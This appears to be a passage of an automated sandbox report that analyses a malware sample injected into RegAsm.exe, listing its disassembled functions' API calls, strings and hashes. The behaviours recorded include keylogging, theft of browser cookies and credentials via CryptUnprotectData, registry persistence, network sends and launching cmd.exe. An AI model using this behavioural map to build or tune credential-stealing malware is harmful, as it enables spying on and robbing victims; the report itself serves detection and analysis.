                                                                  • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                                                                  • __alloca_probe_16.LIBCMT ref: 004511B1
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                                                                  • __freea.LIBCMT ref: 0045121D
                                                                    • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                  • String ID:
                                                                  • API String ID: 313313983-0
                                                                  • Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                                                  • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                                                  • Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                                                  • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                                                  APIs
                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                                                    • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                                                  • _free.LIBCMT ref: 0044F3BF
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                  • String ID:
                                                                  • API String ID: 336800556-0
                                                                  • Opcode ID: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                                                  • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                                                  • Opcode Fuzzy Hash: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                                                  • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                                                                  • _free.LIBCMT ref: 004482D3
                                                                  • _free.LIBCMT ref: 004482FA
                                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$_free
                                                                  • String ID:
                                                                  • API String ID: 3170660625-0
                                                                  • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                                  • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                                                  • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                                  • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                                                  APIs
                                                                  • _free.LIBCMT ref: 004509D4
                                                                    • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                  • _free.LIBCMT ref: 004509E6
                                                                  • _free.LIBCMT ref: 004509F8
                                                                  • _free.LIBCMT ref: 00450A0A
                                                                  • _free.LIBCMT ref: 00450A1C
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                  • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                                                  • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                  • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00444066
                                                                    • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                  • _free.LIBCMT ref: 00444078
                                                                  • _free.LIBCMT ref: 0044408B
                                                                  • _free.LIBCMT ref: 0044409C
                                                                  • _free.LIBCMT ref: 004440AD
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                  • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                                                  • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                  • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                                                  APIs
                                                                  • _strpbrk.LIBCMT ref: 0044E738
                                                                  • _free.LIBCMT ref: 0044E855
                                                                    • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD1B
                                                                    • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                                                                    • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                  • String ID: *?$.
                                                                  • API String ID: 2812119850-3972193922
                                                                  • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                  • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                                                  • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                  • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                                                  APIs
                                                                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                                                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                    • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C52A
                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                  • String ID: XQG$NG$PG
                                                                  • API String ID: 1634807452-3565412412
                                                                  • Opcode ID: 540faca1283a201b615fa294366106f171e649dc374ea9aa343cf977934f0195
                                                                  • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                                                  • Opcode Fuzzy Hash: 540faca1283a201b615fa294366106f171e649dc374ea9aa343cf977934f0195
                                                                  • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: `#D$`#D
                                                                  • API String ID: 885266447-2450397995
                                                                  • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                  • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                                                  • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                  • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443475
                                                                  • _free.LIBCMT ref: 00443540
                                                                  • _free.LIBCMT ref: 0044354A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$FileModuleName
                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                  • API String ID: 2506810119-1068371695
                                                                  • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                                  • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                                                  • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                                  • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                    • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,636A1986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                                    • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                                                                    • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                                                                    • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                                  • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                  • String ID: /sort "Visit Time" /stext "$0NG
                                                                  • API String ID: 368326130-3219657780
                                                                  • Opcode ID: 765a2cec5dfc93fc14e6a06a83629ca65ec94325b3245c099cb6fcf10de14a30
                                                                  • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                                                  • Opcode Fuzzy Hash: 765a2cec5dfc93fc14e6a06a83629ca65ec94325b3245c099cb6fcf10de14a30
                                                                  • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 004162F5
                                                                    • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                    • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                                                    • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                                                                    • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _wcslen$CloseCreateValue
                                                                  • String ID: !D@$okmode$PG
                                                                  • API String ID: 3411444782-3370592832
                                                                  • Opcode ID: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                                                                  • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                                                  • Opcode Fuzzy Hash: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                                                                  • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                                                  APIs
                                                                    • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C688
                                                                  Strings
                                                                  • User Data\Default\Network\Cookies, xrefs: 0040C603
                                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExistsFilePath
                                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                  • API String ID: 1174141254-1980882731
                                                                  • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                                                  • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                                                  • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                                                  • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                                                  APIs
                                                                    • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C757
                                                                  Strings
                                                                  • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExistsFilePath
                                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                  • API String ID: 1174141254-1980882731
                                                                  • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                                                  • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                                                  • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                                                  • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040A20E
                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040A21A
                                                                    • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                                                    • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateThread$LocalTimewsprintf
                                                                  • String ID: Offline Keylogger Started
                                                                  • API String ID: 465354869-4114347211
                                                                  • Opcode ID: 052d9f24e9ed53101c9c6e29893d10a0ebf43ddb848004275c2ad0d2f900b3d6
                                                                  • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                                                  • Opcode Fuzzy Hash: 052d9f24e9ed53101c9c6e29893d10a0ebf43ddb848004275c2ad0d2f900b3d6
                                                                  • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                                                  APIs
                                                                    • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                                                    • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                                  • String ID: Online Keylogger Started
                                                                  • API String ID: 112202259-1258561607
                                                                  • Opcode ID: 1301e6b876f99197b04564c733fafc78f062806f1783c7b989fb50bec4e70a22
                                                                  • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                                                  • Opcode Fuzzy Hash: 1301e6b876f99197b04564c733fafc78f062806f1783c7b989fb50bec4e70a22
                                                                  • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(crypt32), ref: 00406A82
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: CryptUnprotectData$crypt32
                                                                  • API String ID: 2574300362-2380590389
                                                                  • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                                  • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                                                  • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                                  • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                  • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                  • SetEvent.KERNEL32(?), ref: 004051D9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseEventHandleObjectSingleWait
                                                                  • String ID: Connection Timeout
                                                                  • API String ID: 2055531096-499159329
                                                                  • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                                                  • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                                                  • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                                                  • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                                                  APIs
                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Exception@8Throw
                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                  • API String ID: 2005118841-1866435925
                                                                  • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                                  • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                                                  • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                                  • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                                                  APIs
                                                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                                                                  • RegSetValueExW.ADVAPI32 ref: 0041384D
                                                                  • RegCloseKey.ADVAPI32(004752D8), ref: 00413858
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseCreateValue
                                                                  • String ID: pth_unenc
                                                                  • API String ID: 1818849710-4028850238
                                                                  • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                                                  • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                                                  • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                                                  • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                                                    • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                                                    • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                  • String ID: bad locale name
                                                                  • API String ID: 3628047217-1405518554
                                                                  • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                                  • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                                                  • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                                  • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                                                  • ShowWindow.USER32(00000009), ref: 00416C61
                                                                  • SetForegroundWindow.USER32 ref: 00416C6D
                                                                    • Part of subcall function 0041CD9B: AllocConsole.KERNEL32 ref: 0041CDA4
                                                                    • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                                    • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                                  • String ID: !D@
                                                                  • API String ID: 3446828153-604454484
                                                                  • Opcode ID: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                                                                  • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                                                  • Opcode Fuzzy Hash: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                                                                  • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                                                  APIs
                                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
